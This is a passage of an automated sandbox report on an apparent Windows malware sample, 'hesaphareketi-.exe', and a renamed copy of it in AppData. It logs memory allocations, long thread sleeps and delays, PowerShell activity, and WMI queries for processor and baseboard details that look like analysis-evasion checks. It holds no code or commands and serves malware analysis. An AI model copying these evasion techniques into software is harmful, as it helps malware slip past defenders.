                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 25B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 45B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 6470000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 7470000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 75E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 85E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 2CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Memory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1200000
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199890
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199781
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199671
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199562
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199453
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199343
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199234
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199125
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1199015
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198906
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198796
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198687
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198577
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198468
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198359
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198249
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198140
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1198030
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197921
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197802
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197683
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197562
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197452
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197343
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197209
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1197093
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196984
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196874
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196765
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196656
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196546
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196437
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196328
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196218
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196109
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1196000
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195890
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195781
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195671
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195562
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195453
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195343
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195219
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1195059
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194953
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194843
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194734
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194624
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe Thread delayed: delay time: 1194515
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198890
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198662
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198531
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198421
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198202
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198092
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197984
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197655
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197429
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197093
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196984
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196764
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195888
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195781
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195671
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195562
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195453
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195343
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195234
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195124
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195014
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194906
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194796
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194687
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194559
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194452
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Window / User API: threadDelayed 1006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8079
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 634
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6900
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 530
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Window / User API: threadDelayed 3000
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Window / User API: threadDelayed 6854
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Window / User API: threadDelayed 1564
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Window / User API: threadDelayed 7411
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Window / User API: threadDelayed 2449
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 1896 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 6400 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep count: 41 > 30
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 5772 | Thread sleep count: 3000 > 30
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199890s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199781s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199671s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199562s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199453s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199343s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 5772 | Thread sleep count: 6854 > 30
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199234s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199125s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1199015s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198906s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198796s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198687s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198577s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198468s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198359s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198249s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198140s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1198030s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197921s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197802s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197683s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197562s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197452s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197343s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197209s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1197093s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196984s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196874s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196765s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196656s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196546s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196437s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196328s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196218s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196109s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1196000s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195890s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195781s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195671s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195562s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195453s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195343s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195219s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1195059s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1194953s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1194843s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1194734s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1194624s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508 | Thread sleep time: -1194515s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 6504 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2576 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199874s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2360 | Thread sleep count: 7411 > 30
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2360 | Thread sleep count: 2449 > 30
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199765s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199656s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199546s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199437s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199328s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199218s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1199109s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198999s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198890s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198662s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198531s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198421s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198312s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198202s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1198092s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197984s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197874s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197765s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197655s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197546s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197429s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197312s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197203s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1197093s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196984s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196874s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196764s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196656s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196546s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196437s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196328s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196218s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1196109s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195999s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195888s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195781s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195671s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195562s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195453s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195343s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195234s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195124s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1195014s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1194906s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1194796s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1194687s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1194559s >= -30000s
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820 | Thread sleep time: -1194452s >= -30000s
Source: C:\Users\user\Desktop\hesaphareketi-.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\hesaphareketi-.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hesaphareketi-.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199890
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199781
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199671
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199562
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199453
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199343
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199234
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199125
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1199015
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198906
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198796
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198687
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198577
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198468
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198359
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198249
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198140
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1198030
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197921
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197802
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197683
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197562
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197452
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197343
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197209
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1197093
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196984
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196874
